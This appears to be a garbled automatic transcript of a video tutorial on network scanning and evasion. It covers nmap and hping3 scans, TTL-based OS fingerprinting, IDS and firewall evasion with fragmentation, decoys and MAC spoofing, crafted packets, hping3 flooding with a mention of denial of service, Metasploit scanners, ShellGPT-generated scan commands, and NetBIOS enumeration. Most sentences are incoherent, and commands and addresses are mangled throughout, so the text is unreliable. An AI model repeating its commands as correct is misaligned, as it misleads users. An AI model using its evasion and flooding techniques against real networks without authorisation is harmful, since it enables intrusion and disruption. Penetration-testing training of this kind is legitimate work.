post. Just click on text. Now like it. I'd like put as this as many. Now we just this is this post 8. Now this we put just like that take out. Let's price here have to do so it's 7 yes money than do set. So by one you put the stuff action it on the address everything. So got everything very now we are getting this demonstration discover more and service run on the target. Even this way you can just do season but it's you get only 1 month of free cuts here. So that now we are going to disable scanning next. So this is a command utility or if network request. It is not to see every time why not as feature as n it's select for plus x. So it's like x to for risk is uncommon. Simple is for add for a scale case for a specific for x2. So there should be a 6 ARP with the specific end of your stop where I so automatical because a probably invalid space again practice. So 6 ARP champions restrict and subnet of PS. You just need to bring a just the ARP catch. So enter your job. That's all. To get a ARPG SX342653 IP address. So you can see that address. So where get your target address which was running on 84.6. So here open source this here. Now you can look also as present can specify ARP address can be set source PPP. So you can also as get of the doesn't any ports like press ARPG. Now we are that is target for 3 years.
So there are now look this we like here. There X unit just is a internet none that here. Here apart oh code which that is what now it's the definition of using SS. So we are going to use XO is net static staying. So what is is a map powerful concept is network design skill. It's a network providing a detailed samples for all resources of insertion. When we use a map chat, it contains captions including story ports and reverse detections and much more incidents. This is again methods, platforms, window quiz, type of network ports carries the operating still scan then scan. We are doing all by also I want to line that one is also this is I guess okay so next now it was so now let's let it here out I like my title here post me so first let's you take off so let me I will go to this I will okay I just here 92.3.8.1 let's see so, first I will connect CP scan let me type this minus evasion yes for this open finally enables post of scan now it's port is 1.1 not going to be just need to ask. So, TCP connects completes a three-way machine, a target machine. The TCP3 client packet, which the package with the SKIP plus chain. In the client SKIP plus not will push packet to connect. The handshake is the 60 and connection. Now we can verify purpose. They did stop by. So I write on it. And this is now you can click on port access. You can fire port now okay technically this allows where the person is to trust whereas this also and for thousands is this so I six success available like the red commands not place as well and as well everything here we have this now in this section skills three up scan access IP minus and apply pro scan machines I would I might solo the let's look back at summary window of I would ask direct let's back now like on the specific post scan now it's just what by find the title here now we would likely consider here deals a resulting by answer not enough signals and has in the context of the skeptic sense why the firewall tools are mechanisms and hide the network where which only present this was we that's present now I'm going to step here stand like to stand we will so step here is the whole the whole thing that can be means that has been on the machine size one of the here one other access that is great three and push look said the can open code that will receive no error from the customer in the packet code that's you the backend system us so now this and that's why if I tell the query only then that's let you like someone's cat queries just as that. So that's yes this is the open of the time which the first will copy the system or average pro he said it if there is no response in the is opix asti packet is sent to response then the port is closed now see here uh, there is asti then the port is one now I would like come here now I will firewall file so let me just turn off now. Let's line right here. Now again, send one back. Now let's see what else we got. Now in here, both 70 goes. We can able to hear the macros. That's here. Now, entirely, the targeted, you like to try here as acknowledge back. Proof scan. Now just here as acknowledge scan. The results displaying that the port filter dimension as shown here. Acknowledge that scan. Submerge packet and random signal. No response implies that port is filtered. The stateful firewall and the RFC responsibility is not filtered. Now let's apply that. So we take browser filter response. Now we would like to do as a UEP scan. So this scan will take approximately 10 to 20 minutes up to that happening. This one here UDP scan. The UDP scan uses UDP card instead of CD. There is no 3 hash for the UDP scan. It sends packets to the target host. No response means the port is open. If the port is closed and SNMP port and port. Now it was open, it was open. Now what to do as a NAS scan. Now let me just present my scan for again. I said present that as my for a first get the results. Then I just like to scan here. So now let's wait here. Placing the null stack at a target that was mentioned here. Now it was a scan. It's a results one. So how this scan is storytelling. It shows the following are IP address and otherwise SCTD insert then STP echo and set. Submit a long weekend of this one as once compared to this. Let's see it was. So it might take a lengthy time process, so I just don't want to wait here. So it shows a little bit time is remaining. It will take a lengthy time process. Even if it are required also, it may take a lengthy time process to complete this task. So service time, this output is 557, which was unfair. Now let's be like to wait and see how we can get it here as a result for this. So there is a 48 seconds is remaining. Now let's see what is the output we can accept from here. So we'll try one against with the system visualizing again. So it may take again a bit more time. Let's go to this post where we have sequencing. Now let's look this. So we take another on the kind process. So now it's I would like to bring this here. Now I would like to open as another one. So yeah, just enter our target. Like that's what we got on straight out 18.17. Now here I would like to clear as minus s. Alright, so I will clear I hate the scan. TCP scanner that can be used to send a good source address. We come to discover what the services are available. Let's share us. Need to specify, then try to scan. Now let's not resolve the ideal scan. So just try yes. Now let's look. It was pretty. That's it. So it working. Now if we scan and any channel is sent to that host, and it does acknowledging corresponding. That's the double is for our outlet. Now let me try here as y. So now get here the host is up, not sure to filter SCT ports, no response. SCD cookie echoes a cookie echo check is sent to a target host for response implies that the host is open according. Now we would like to try as a check here. Now run scan. So 5200 SCD ports the response we have got here. Now we would like to discuss about service detection. That's what detection helps you obtain information about services and versions and target system. Obtaining an accurate service version allows to determine the exploit of the target system is vulnerable. That we need to you just need to put here as a version. Got it. Now just I have to scan. This also may take a little time. So this is not gone through. Still also will take a long time also. So and is done where this was decided. Now to describe to set entry, I just like what is A is for aggressive scan. Aggressive scan supports detections and scanning and tool and use instead of network information. You can look where this here a Microsoft HTTP here version 20 it was described with a specialized JavaScript running just guessing a VTech embedded with 87% Windows Microsoft XP with 85%. So when you find what you can do it here. So this concludes the definition of putting a target open services, versions, devices, details, account, active host artwork using best techniques of NMAP. So now we are discussing about explore various techniques using HPP. So what is HP3? HP is a component tool for crafting and sending attacks to perform a wide range of network tasks such as scanning, troubleshooting, and testing for administration detection. Unlike tools like NMAP, HP3 was a granular or packet setup allowing for highly customizable parameters. So why do we like to use HPP? So packet card allows users to modify TCP, UDP, and IMP for a detailed scan. Erase firewall and ID for sending enhanced packs. Protocols work with TCP, UDP, ICMP, and raw IP protocols. Low-level analysis. Ideal for advanced users who need control over packets level details. Now, we like to let's we like to walk to connection. Just like walk my lines. Like just make a little bit. So I prefer like open this window also. Let me just make it as a now let's just start diagrams and controller or data. We just type as what are the 2020. So let me just type for now. Here this is all. Let me just type with this on so I just try here. Let you can turn a terminal. I just need to switch here. Enter password. Now it is like as hping 3 minus 802 100 minus s. So I just my type to run straight 18.17. So once it specifies the scan mode, once it specifies which of the host to be scanned, once it specifies what the root we are doing open puts on the name of the size running on each shown here. But here not at present here, what else is the open port. Now we can enter here as a one. Let's like I have got about 80 is only the one port. And my other system is not at open anything else. Yeah. That's it. Now let me just type here as a hatching 3 minus p minus 2. Target IP address monitor 18.21 port 80 minus so port 8 minus C5. So minus specify the bin flag, minus specify the setting the flag, minus specify the URG flag, minus specify packet specify minus P support. Let's like now this here 5 packets transmit 0 packets risk back. So we have lost everything. Now I'd like to scan a specific port on the range of 1000 ports from my target. Now just I like to make it as a little bit big, then we can understand here. Let me clear. This is right clear. Nice paras 3 scan 0,000 s type errors on 2.18 dot 1. We would like to look here. So where I have got here one with thousands. So I need to specify 1000 ports. I just need to specify here as only
and that's it. So we have got here. Now we have to use hping 31. So and specifies the SNMP ping scan. Then specifies for the count. First I would like to specify the parameter. That's control.instead.a.1 and what is a count. Let's learn. So the result demonstrates that hping sent to a SNMP request denoted results here. Now we just try here as with other target like this is going to example. Let's be back to here either which may can get results back or not. So we not get a result back. Now we just try here as the survey recovery techniques. You know, we use scans like entire scan. Like I just put as h3 minus 2 and target is 1.1 port 80 minus C5. Let's we like to this. What's the results? So we are not give back the results here. So this concludes the demonstration of discovering outpost and successful live host of the network using hashing. That's this. So now we are identify the target system OS, the time to live, our TCP windows using a wireshark. So now how to target system operating system? Analyzing the detailed value of TCP windows size using a tool like hping3 or wireshark. These views provided a clues about the OS and target as a default operating system have a default setting for this parameter like TTL and TCP window size. If an IP packet determines the maximum number of ports errors. A packet can be through without being a discard. Each router is the TTL value. Different operating systems use different TTL values. TTL fingerprint. Like let's be like a Windows is 28 and so this is 2.5. Now this is size. This indicates the amount of data the server is going to accept with acknowledge. Like different operating systems have a default TCP window size. Like use 1 bytes take the data in Linux. It will take 584 bytes. Right? Now here we would like to here. So let's so first we would like to get a shock. So first we would like to get a Wireshark here. So based on operating system here. So I already got a Wireshark here. So I just type here a Wireshark and you install Wireshark. Now before this is my Wi-Fi 2. So before you just keep it like this here. So first you just get here. So just type here as a SSH search. So I'd like to go to SSH search. So I want to do it live so you can understand very easy. So I don't want to test my locally. So I want to type here as a Windows. Second Windows of system in Microsoft. So where I have got the IP address. Now we would like to come here. So this is my Wi-Fi. Further I just type here as command prompt. We just type here as a pin. I just this. So I don't want to run. So before I'm going to start this, so I type pin. So it's not working out like in this main system. So in main system, if this is not work, we type as ping Asia. That's first thing. Now let me just copy. Nice right here. It's nice. Nice right this. So we have getting so okay. Now it starts. This one first come. Now just write as OCM. Just in like this. So when I have got ATL is what now just look here. Let me process. This data is 1 byte. Data is 0. Now we would like to look transmission control protocol. Thing here. Now internet protocol. We would like to look here. It's 128. This was Windows. So where is came here 128. But this does not match here. Now we like here because I was trying here from Windows. So that's why. Now we would like to try. We would like back here in this. Just copy. Tell them back here. Just typing. Time to leave is 51. Now it's okay. Now let me just do this. Open again. Now we would like to strike cut it out again. Now let's come here. I'll come to here. So open a command. I want to run as an administrator. Then it will unboot. I'll just type as a thing. Let me just do this. Now I just stop this. Here you can look here. This time to leave is 128. Here is 55. So here I not get the right things. So this try to leave. This mustard should be matched using a proxy. Here, because we right here as ping. Just now let me just make our manual as our call mission as 192.68.7. This Python, unless we would like to. If okay, time to leave is 1 to now it's match. Here it was basically 1 time to leave match. Here it's 1. Now I want to try another. Now let's on this machine. I want to turn my call lines machine. I want to ping this my call lines machine. Let us wait here. So let's wait for this interaction. I just want to just open the smart 92.60. Now let me do the bash and just save. This was on a nice thing. Just right here on extend. Now here that TTL is full. Now just close. Now you can look here 21/68. This is not relevant. This is protocol 64. Leave. So here not get this one. So this case we not get. So I'd like to close this. Now just type a macro. So everything 192.168.64. In this command block, the play is not reachable host. Just type there. Just type enough to type everything. I'm in here. So I just type. Now let me start from here. Continue with save. Just come here. Let's type here. Spin. Here you can look here. No, just process. Finally, you can look here. Time level 64. Yeah, this match is successful. That's it. So this concludes the demonstration of acting ways of that in your shot. That's now we are discussing about performance physical using v13. So what is physical? OSINT identifies the operating system running on that machine. NMAP use this by analyzing a network or fingerprinting. A system specific behavior like a TTL value or TCP options or ICP response structure. Why would we use X3? NMAP extends NMAP capability with a law-based script that automates various tasks including like adverse direction, service discovery, vulnerability assessment. Now, we would like to look at this. Just open this. We will open our line session. Right. I just make that big. Like I on a box, and I just pull that up. Here in the Firefox, just like what else is required. So just like a search for census. So we will go to census card. This. So just need to like that. So I would like to just I would a target domain by I because I just want to say full services. So let me search. Now let's type for sort of now was available. Now let me I consider this type IP address just for now. Let me just make as we do the video. So start as SU and hello password. Now it just as nmap minus 2 minus address scan and enter IP address. So I just take the IP address from say here 1.50.1.135. So now I get the nmap result. Now let's wait for the nmap result. So A is an address scan. So entirely what is available will be print over the address. So you can look here what is available. Both is available. One is available in 80, another one is available 3.10, another one is available DCE RPC port networks and we this I want this for mapping. So there is everything available here. MySQL is available. Everything is available. So let's wait. What is the open here? We can improve. So we just wait for a little bit patient so we can get the results here.
So it may take a long time, so but you just need to wait here. So wait, you can get the results. So let me take a 3 minutes time. Let's look here. Yes, we have discovered here. Now let me like here for 19, 30, 80. This is Microsoft HTTP API. So this is available. There is no HTTP with a robust C that is for special API. So you got a length of the results up here. Display open boards and links along with their version and the tag details, OS, computer name, NetBIOS, computer name, etc. First principle is with security mode, S5 version that works for the server, sorry, SM2 tag error, execution may use minus -t. So we have script results are. So we have identified that, but not much information about this. So let's pretty good here. Now we have this one. So now we'd like to find the operating system. So to perform OS discovery, let's come here. So in this place, I just here as -o, just enter. So now let's do it. So, NMAP is like to take a lengthy time process to wait with patience for the NMAP process. Then we need to get. Now, you can look here the open ports. Here, a lengthy open ports which was displayed here. This cancels we are because we do not find the not idea because of seeing close TCP ports. So this is impact no worries. Now we just clear here as map, view like as map, view like SMG OS. Discovery. .NET. This SMB best discovery .NET and her calculator. So I'm not say anything dot. So we like to this ideas. Let's come back. I would like to this ideas. Let's be back here. So the script specifies customized an SMB equal to OS discovery.NET. It will attempt to define the OS name and domain and current SMB cost and ports. This is the whole of this here. So you can put the demonstration of discovery OS running on a system using a NMAP. That's so we have OS discovery using Unicode scan. So what is Unicode scan? You can design performance network runners tool designed to information about system outside standard. It is clearly effective for a large scale scan and offers immediate such as asynchronous scans, request tracking, and fingerprinting. So why use Unicode for OS discovery? It supports for IP scanning for networks, advanced encrypting for fingerprints, OS written waves, IP, such for standard and bus protocols. Now let's just open up your file animation. I just type here, just type such as Unicode scan. Just type scan. So where you get here. Now we would like to utilize immediate mode display the things we need to find there. So we would like to utilize this one. Now let's display. Just type Unicode scan target idea. So we want to utilize this target only. So we utilize here only. Now just look here as type. Let's even look here. Where TCP post was available here instead of that. Big post open for here. The scan results here displaying the TCP TL value of S64. The TL acquired after scan is called, and the OS is possibly a Linux based or Google based machine. So this information attacker can combine attack strategy based on the OS of target system. So
This includes the demonstration of discovering the OS of machines in the Unicorn stack. So it will display a lot of facts. So I will like this. Size. Now we're going to be discussing about a caviar IDs firewall ever technique. So what are IDs files? So what is IDs? So IDs defined as agent detection system. So it is the network for a suspicious activity after administration of potential system. It is a file. It will create a traffic system behind block unauthorized access to the system. But we use evasion techniques. Yes. Evasion techniques modifies scan behavior to bypass these protections, enabling clear recognition like block SSPF packets, detect and alter administration code attempts, and packet from repeat scanning attempts. Like if you try any type of website, you try more than 3 times the lock will like that. So these are evasion techniques and they have IDs and files. So we like to bypass this one. So for that, now we would like to utilize here first. Our first task is let's go back to our online machine. Now let me just open our tab. Let me click now just type your SU, enter password. Now just press F, minus F for H to use stuff I packet into any fragment packets. Now I just need to enter my packet IP address includer 118.1.127. Now the packet addition to a splitting of back into several smaller packs while sending it to a network. These packets reach the host first behind the host. Generally, queue all of them instead. However, since this method of processing involves either a CPU consumption as well as network reasons, the computation of most keeps the bit packet to the host step. First, we have to come back here, Windows. We would like to open a jump. Of course, we like to do a control panel, go to security, setting the firewall. So this I know to turn off this out here, so you can see this. Now we just try to now here this Ethernet is 0, you just click this. There is a admin. Now let's come back here. Now just put this. Now wake up and result. The same will be displayed. Now let's go back here. You can see here where a fragmented is after with my calling sequence. Let me just put this. Where you can see here easily can identify. But here I got a TCP request. So multiple fragments it was here. Let me we would like to start here as I just with the same. Now let's come here. Now let me just type here. We just type a nmap -80 and I want to enter my target because I'm instead of 7. So it was in this command can use a source code object to perform a source code relation. So manipulation refers to a manipulating a port number with a common port number to evade IDs of files. This is useful when the firewall is configured to allow a packet from well-known ports like DNS, FP, SH, and NetBIOS. Now, I look here. What results now? We like to switch to Windows. Now, we like this. We just close. Look here. It was come with right to this. And here's what. Yeah. But I got green. I didn't get that right here. So we can see it was captured. These port numbers 8. So yes, that was you got very quickly from here. So that's it here. Now like do here another just upload a continue with the now just come. Just use a app minus m only consistent of it not 1.7. Now let's view like here. Now it was get different packets. Now here using is all the packets are fragmented. Instead of sending one complete packet at a time, taking away a filter condition and its target mission. Here. Now I just close this. Let me go. Now let I just hope for the now for this run. Now we would like to run another command and just set there as nmap -d rnd. I just put as data and target right here. H.1.7 I will come back. So internet I just want to enter here. So and B performs a device scan -r generates a random and non-resolved IP errors. Now you can look at towards generating almost plenty non-resolved IP errors.
plenty of. So decoy reports the generating or specifying IP address of a decoy emit and away. These techniques make it difficulties for IT cyber to determine which address was actually scanning the network and which IP address was for decoys. Using this method, automatically generates random number of decoys for scan of randomly position. The real IP address between the decoy IP address. So you consider decoy as is like a fake IP address. So if coming from a address domain to get peers, version type, you can't even get with the peers. It's like an onion website. You know? So let me just close this. You can look now the brands where each targeted peers. Every there is an IPs. They don't know who they actually speak or where it came from. So it's a by now. Now we would like to put now Mac address. Now let me just one a short. Then let me just back just like here. Type as as FT as DN so Mac 0 enter the architecture address 160.18.47. So before being let's switch to the start for the thing. That's why some options that requires a packet to access. This will not be hard for TCP connect scan. So now let's come back here. Then it's spoofing out the MAC address. So MAC address spoofing techniques involves spoofing packets of user of net. This technique allows you to send a request packet to target network print to be a host. Yes, this. Back to file. Okay, look this transfer control call. The Windows size to 1. That's great. Now let's close this. Destination address. Source is Linux. Destination is Windows. Etc. Time leave is 60. This was saying 5. So this will be coded. So this concludes the demonstration of IDs and files using evasion techniques of NIP. So now we have to discover a create a custom packet using a packet builder to scan beyond IDs and files. So columns of packet builder is a tool that allows the user to create a custom for that one. You can use a custom packet for a testing network security, evade IDs and firewalls by modifying packet headers and simulate a specific attack for every penetration. So why we use a columns of packet builder? IDs firewall software building packets to detect attack extra traffic that bypass that define packets or you can test them by file IDs and for unaffected traffic. Now, but I just would like to install this. Just let me just install. Okay. Next. So once you install this. Now let me launch as a shop. Now, what is required from them? So I just this. We'd like to start a capture. Now, let's review this. Now, let's go down, scroll down. Now, here is a color of backpillar, just like this. Let's launch this a color backpillar. Now, it was launched. Now, let's close this. Now, now click on now to here just click on button. So which one would like to do? Microsoft VMware Internet. So I just need to Microsoft. I just click on OK. Now just put as you want to get a packet, otherwise IP packets, otherwise PC packets are used to set only packets. Just click on OK. Now it was displayed here. You can view here the packets info of packet length, capture length, delta type, destination IP address, source address, protocol type, add a solution protocol, hardware type. Somewhere we have got plus of packet. Also edit and decode the two editors, RD editor, located in the left panel here.
Excited? Send the packets. Here, now just click on send packets. Now just like to here, this one. Now, first no okay, the packets are just try to send. So you have sent all the packets. Now, the second packets is broadcasted in the network. The active channels the receive packets and few start responding at ARP and evaluate which mission is responding to the ARP packet. You need to observe packet to capture the wire in the Wireshark window. Just come back here. Just uh, here, yeah, where which was responding. Yeah, so this that's it. We have got here. Now switch to here. Let's close this. Just export this one. File export of packets. We just save packets.cap. That's it. Now like this. This also stop. Now, using this packets, attacker can use packet to create a packet to pass the files and IDs. They also create packets and flood to the beginning. This is very much of packets, which could result in DOS attacks. This could be of creating a custom packets to scan target host via IDs and files. So now we are going to create custom VPN TCP package using hping3 to get the IDs and files. So we already discussed about previous tutorial as hping3. Hping is a command line command after use for networking and scan network stream, firewall and evasion and encryption. Now let's walk through that tutorial. Let we just stop here. Let's open that tab. Before here, now let's outline here just for the Wireshark. Now just switch this one to come back. Now just try to the issue and also I just make it a little bit big. Now just try clear. Just three. I set up on straight out 8.7 and just specify VP and just write RAM source data file. Now the address under data. Now let's we would like to look up in this. When you are getting here UDP, that's here. You can see minus UDP specifies the packet of target minus RAM. So enables the random mode minus data for the fit for the size fine, right? Now we would like to expand the packet as so there's this so text loads. Now there's this UDP data size. You can see here length is 5. If you specify any formula that will be displayed so make it as expand this hash now we just try as around let's back here so we just this like H3 S enter vector and 27 C5 minus S is the request from the request send C is the count of S sent to the request. We would like to come back. We would like to continue to save. Now let's get was this expansion of transfer to remember now like a explorer 50 package this is 1.7 slide. So this is the add of the flooding mode here. You can see along flood 20. This package is straight. Let's take source destination. Get packet source port and destination port. And here, terminal. 1 second you get 1 minute to cover question. So here we need as 3 questions. Enter currently totally a website. You can also use background tools. Let's go read that one. What's happening right now? That conclude them on ID supports new hash I will take this. Include that once Metasploit is appended that is a sequence to contain network scan on X guard a direction. Just talk to I got this. We like this. Perfect. Like, go back.
that is stop. Now type as so and now keep just type any papers. First you have select home cards. Just type now just type click now just type yes. And have maybe basically in this is a start screen. Let me just type exit. Let me just type post here. Then you type start terror. Was done. Try settle. That's right. I just tried as it was very close to yes. Okay, now this is n minus s a s a straight a that zero by four. Now, okay. With carry and it will take approximately then you will put one with some. So let us see. Is running now. So it's very like 5 pages. Now the 80 are the short one is about 50 second. I don't make 80 order to was the stop. As we got a lefty speak here, but the results here. Now just like a big import. So import options here. Now like here. DB import to X where we have put all the text. Now just type posters. Look here, posters. What is over here? One with macros. I also any secrets. Please understand that my Windows 2020 max. Now please type here services. So we would like to look here as services. Then the post prototype name everything which was discussed here. So if you want to try here, it's as post using what this you can check otherwise. So it allows this post and everything start here. Now like this. Now, we would put such a scan. We have seen here a put scan. Let's check which one you like here. Use 3 for X scan. Now let's try show options. Now let's try set. Plus interrogate. Right? Let's start with say 80 right report. Let's try run. Otherwise, I just put here 127. Let's try run. I don't know if it's computer, so I can this here success and type as such scan. I would like to use a 6. Nice type show options, interface, example. Now just type set ports. Now set clusters. Into that set 8 set thread equal to 50 run. So the options are updated here. Why? Because now we get say this we are getting a but so now as you write set exploit scans. So estimation there can be for analysis of both services displayed and the tag post. Information of gathering information about open post, a list of resources running on active post information, related as well as others. That's it. So we are going for as a scanning the AI. So we would like the first thing as a hedging scan the AI. So attacker can use as a hedging to scan any automated address there. So how to do it? So if you do as a with like normal that a simply is a but with AI also it's quite easy. So you just need to with the tag. So then do the right here. Then you would like to go as just right as clear. Now you like as a SUV. Then you just put as a chat. Now here is not getting here is for scanning the network. So I just put as simple as a scan. I just put here as tell. Now you just press as a use helping thing. So you just anything else however you require to perform ICMP scanning on the target IP address and target IP address 192.168.1. So I'm putting my target IP address and stop after address. That's it. Now it will ask you to execute this command. That's it here. Let me just put as execute. Open socket operation is not permitted. So this I just need to run under the root. So as you enter your password. So this is when you the command also. So even you can try that command also. Let's see. So it will not work under the root. Okay, like I just shell GPT. It's all like exact. So let's just try as v13. So I have presented for IM scan on the target IP address and so after 10 iterations. So just here, let me just here as one more time. Let's go as an exit. So it's not presented. Why? Because you just try here. Sometimes ChatGPT make as a error, so you just need to mind that. Also, it's not as minus I. ICMP is put here as count error like that. 192.18.21. Plus, I would like to type under the HP3 ICMP. Let me just put here as a count. So I wanted even the count in there as a thing as 192.18.21. Now, so we just give the parameter. So right prompt, you can provide, you can get the right result. If you provide the right thing, wrong thing, it will not give you the results. So the attribute is that why it's the terms and conditions. So we just need to give the right prompt. That's it. So let's you like to give as a right prompt. Let me just press exit. Let me try this here. Just put here as HTTP, here as a chat, scan, just put here as a shell, just use H3. So I don't want to go here as a line. I would like to use as I would like to put here as a HP. In this case, that was a wrong. So I would like to put here as a shell. I would like to put here as a HPing 3 as average scan port 80 of direct IP address 1.2.8.1. Let's view back to oh sorry, let me just start with this. And the targeted IP address. Now let's move back to here. Let 3 minus 8 as a cannot open or out. Operation is not permitted. So this is not installed under the root as a shell. So let me like here as sudo su source as a virtual. Let's go. and activate. I would like to install shell GPT. So it's very satisfied me just we like to utilize here as plus again my API. I would like to as here as API. Let's close this. Now it makes connect like first here. Now one done. Where I can get anything else from here. Now go for ChatGPT. You just put as a chat shell. I just put here as a run a HTTP as a scan port 80 of a target IP address is interrupt 168. Let's we'll have to look here. It's a chart. Now let's have to look here. We would like to execute. It's a 48 and 0 data bytes. So it will go as a results over there. If you want that as a results now, if you look here the in the targeted system, let's you can open as this is my Wi-Fi 2. Let's be like to first. You can hear from your targeted address are sending us 80 packets from here. A heavy 80 packets. It's also come with your file side here. So I don't want the switch. So for a reference mode, there you have got everything. So that's it. This is not any type of data here. So this is how you can manage. You need my or hard data. That's it. So I just see it's that's. So guys, now we are going to discussing about host discovery AI. So what is it of host discovery? Scan target network of active host and place the IP address into a file to scan a send and run fast and compressive and max scan. Scan with a lower velocity and write the result as scan2.txt. I use a perform ICMP request ICMP we have done before multiple things that all the things that's so let's do a simple command. Let me I would go back to just write as here. Now just write as SVP, just put here as chat, we just put as scan, just here as share. Just put here as scan the target network is 92.168.18.0 by 24. Otherwise you can put as 16 also, no problem. For active hostess, so I am trying only my local host and place only the IP addresses into a file as a scan.txt. Oh, sorry, let me just try scan. Now, let's. It will so where that will give me as a right result. So let me just type as a execute. Now, let's look here. This scan is scan.txt. Where you have to run in scan.txt. 1, 16, 21, 24, 124, 26, and that. So it's active IP address in your system. So in the database use, you need to put your insight of the target address. So your domain otherwise x.com, otherwise choice group. So now let I would like to use this targeted list. Now to get a somewhat a results. Okay. Now I would like to use as a SGPT. I would here as a scan. I just put a shell. Now I just put here as run a but it compromise map stack against a scan.txt. So I already scan.txt target in my target system. So locate them only. So need to worry about with lower city and right the results to the scan one next. We'll scan the results entirely. Now, we view the results. Now, let me adjust it here. But look the nmap scan. This is scan.txt. You can add a scan.txt when you use the process will do. So, let's wait for that. How long they would like to not this will the advantage of change. And like so, if you have more excited and curiosity, if you just ask clear, just like scan is scan.txt. So, where levels is not present here. So, it will take a time process to read. So, we just need to wait for it. Take a little time process before so let's do one look here. I do that one let me. I would go back here. Yes, say so. Let us start. Now I would like to try another as a SNMP. I should get as and I just put here as and just put here as a use a perform. I see the I would like to put for example I can take him sweet and market is one of the story about so the command is already being used by us. Now you look here they have got edge as image. That's it. So this may take little time to perform this all testing. So first change what is required as perform before we simple what is required realize that the and exams are so you can get all some information. So now it allows and it is an IMAP and other things out. That may be going up for you. So still it's spent. So how long will we take here? So we have to say yes version number as a scan1.txt. Let's get the entire scan. So where in the target where FTP is open is it's not necessary it's only technically resolved. Now the second one where 80 are participate and I can the 60 output one a lot of things so, but it's not yet presented what we require the object. So this is what as a nmap results with air. So now let's discuss with hashing and with air. Now let's make standing time. So we would like to do as some real time projects. So let me start asking. Afterwards, let me here ask search. So just from here, let's do this. So cloud area is too big. So we will not do as much as possible. Now let me. What's your target is like? When I just here ask a telecom. So, we can start later. So, this might let us for a put. So, there. Let me put like here. It tries as GPT. Just it as a as let me. I just put as a scan and I just put as minus minus. Now, I would really use map. Find a open ports and target items. So this is my title. That's it. Next, we would like to get a results. There is as a now it was started as an now let's move back to here. So as an upper so that's outside. So also it take lengthy time also. Let's I'd like to give as a another thing like a port scanning with a with conditional. Just go back here. Let me just utilize here as a clear. Just put here as SCP. You just put here as chat as a scan. Just put here as a shell. You just need type here as a use nmap to scan for open ports and services against a list of IP addresses is scan.txt. So I'm going to write scan.txt and copy only the port sizes, service, and version information with effective address new I this any of my process excuse my presence. Now also like that another thing just then we get to work. Now just put here just so like go for a second for a second for send on I get dot great. So this as you because I think it's not even get it's a get so a layer of get so I have to you can as what we can to say it's I like as I would put a get concept here just as X must don't miss this much so so this is we make as this also this whole keyboard area. Now, let me do use is get now utilize as use can use as can for open and source against a list of objects. I think guys elements and all resources are used and so required so to just here can that's it. So actually that state and state. Let's back to some level basket here. So how long it may take to get this here? So they take a time for to get. So red line was directly ran so this is all. This like I would like to guys. So I would like you to hear with us say some version discovery with air. So and attack so whatever resources on the target. So let's do that was using the air. So we will get a solution like so here as you date to scan one boards this cells open with their sections on like 22 dot yeah that's like what's the we can set so this one can happen and again along with the say so like just then time activity may take so that do take long time so this way so it's what is with the so that's like a sweet so we can do
He said actually go get out that one. So I think maybe okay if it's like that.
it's a script now like
I think that but on not take for the other if you don't if you something not open number one day class if you do at the last very then this is it's all
So, this one although it's check again and one. So not everywhere there is means here.
Then now you go not yet have any not yet have say and this one. After that, which one go to one. Then small mistake they cannot proper and have the one made in two of him. Who for some they take small mistake this one because all this one the brain of the time that also. That's why I love very because he see he do this one, he do this one, he may fix the NASA, he also have a technology and he grow up.
So where you have got us high. They matters that's here every option here. So where they like a trail check suppose open from crash who delete from lock every information is here. So that's here. So I would like to give you the letter one. I can get this.
If he's smart, he has to become the smart.
So guys, now we are to discuss about best discovery with air. So let's we want to try as a best discovery with air. Let's we like to this issue. We are like to type as SVT. This would start as shell. Then this we use as ticket template to identify the system running on the target IP address.
And then he spent money, okay, he do the
192.6.1. So I just give as my main app. So let's wait right exits. Timing is get okay. As what is that's what give the port rate. Just get right close. Now you like perhaps. So this is like gear. So that's now. Now let's try this. So the same thing at different point. So just give me the last part of the model. That's it. As identify the operating system running on areas. As a TTL value. So I have a topic so it is topics. Now let I have to present as SPR start SPR start. Now it has a use as a script in to discovery. Access in scan next. That's here. Minus 1 was discovery and I in the file of this. This estimated time is a 310 is started. Let's view how to make it. Let's so take it and street so maybe yes and it works rates because rate top yeah. So you have got here entire. So what else output is getting as a open space here as process with the SNMP version where to select with one only. That's it. This one as is so now we will take a network scan with AI. So creating a now to create this now let's just press SV then it's gonna start scan and just be a step. Now just put here a script which automate at the network scanning efforts. Fine. Fine, okay. So let's run codes now direct files, access to posters, to put real lives with the so this will take of links to this. But the time is 515 and 315. So this is still lengthy that you it's like you are in a bulky program so that will give you as a bug. So here I have made a multi where we look at a bug in our apps. Ways of a simple way one to write down script. So we can use the one. So this will get a lengthy time source. We need to write a last 8 minutes or 3 minutes. We want to set so can you try this? Can you try any others? This one. Then can you select me? I would like to try this. Cancel as another tool name for us for is detection and as extra. Oh. So let's try this. Maybe expert foundations on the so survey banner, yeah. So let's I think still along. Yes, I think we have this. Right. So, yeah, we can here. So, if you want to install, try this as a so I don't like names. You say as a these are things they can next year's I want to say sorry code language. So, where we enter your target, like say have connect multiple directories, so that can be as SL automation in any way. That is why. So, if you have organizations like zone.com as or something else, instead of you it's lost from they not give you an results are big part. So don't ask. It's black wait here. This scan let it be done. So as one use nmap to find a open code and so at where SNMP or he just put for a total we so all put by a you cannot get it. So this is for demonic WL analysis. I think it's like what was the data. So accept the it's open but here so the is coming you can results let's click here directly. So so there's apart from this. So try just here. So this is that radius are little arrive hosts and different and that's it. That's it. 166. This is the address where got everything. That's so already the scanning line first we like enumeration. So guys, that is about a company called Enumeration. This is Enumeration. So in crucial in exactly process, it was systematically extracted information about like network of the missions. Gather it as user name source and shares can use to discoverable in Enumeration is capable in the like it's engaging gather information like but innovations. This is important because it's quite for you cannot see extremely effective. So it's like I and like share source and it's like resource documents and operate the source. Significant CP gives the limitations. So it's on back actions. Label and NP use information the some orders. Networks. A share was their basis. I can do like NetBIOS, escalation, enumeration, and evasion, and SNMP. As you do is like a having or querying default shells and networks. Now let's like to walk is just in the part. So now we are going to express the NetBIOS is commanded as SD. Now NetBIOS is also gathering about shared resources, users, and types of NetBIOS Windows command as a Windows and net that used for like using IP we would like to which I can post further in the we would like to use something as NetBIOS. Let me I would like to this NetBIOS and we would like to open the like here way like we just this we just try to get done like then if you get errors otherwise you just I in the prompt just pin like scared errors yeah so first of all it one is in your errors I would like this copy so errors from let's type and run calls I'm getting here so then for sure clear here now it has any minus a thanks targets here we have network let's be like this why do so why goes out so let us this yeah this I have this one administrator so I think like this you're getting that's not exactly that okay I just do but yes so that's just we can start that's right I so there is hello here put 8 is again so that you can see so here if something is running here let me just press a one I will choose let's copy now let here NinjaRAT and this as a I just use that like errors if any is active over there we give a as get here like so then here like first this when you extract minus a so where you get the internet to plus that will be the required 